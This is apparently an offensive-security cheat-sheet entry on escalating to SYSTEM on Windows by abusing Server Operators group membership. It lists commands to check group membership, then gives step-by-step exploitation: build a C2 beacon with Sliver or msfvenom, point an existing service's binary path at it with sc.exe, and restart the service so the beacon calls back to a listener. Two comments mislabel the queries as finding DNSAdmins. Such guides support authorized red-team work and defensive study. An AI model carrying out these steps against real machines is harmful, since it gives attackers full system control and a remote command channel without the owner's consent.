๐Ÿ‘พ Overview

Members of the Server Operators group are able to modify services, this can be used to execute a malicious exe instead of a serviceโ€™s normal binary.

๐Ÿ” Discovery

This requires a user in the Server Operators group.

# Check your user's groups
whoami /groups
# Use PowerView to find DNSAdmins
Get-NetGroupMember -Identity "Server Operators"
# Use PowerShell to find DNSAdmins
Get-ADGroupMember -Identity "Server Operators"

๐Ÿ“Œ Exploitation

First youโ€™ll need to generate a payload to execute, ideally a beacon from Sliver, msfvenom, or another C2 framework.

Next, use PowerShell to edit an existing service to execute your beacon.

# Change the binary path
sc.exe config [SERVICE NAME, EX. "VSS"] binpath=[FULL PATH TO BEACON]
# Ensure you have a listener running on your host
# Restart the service, this should get you a callback
sc.exe stop [SERVICE NAME]
sc.exe start [SERVICE NAME]

This should get a callback as NT AUTHORITY\SYSTEM.

๐Ÿ“ Resources

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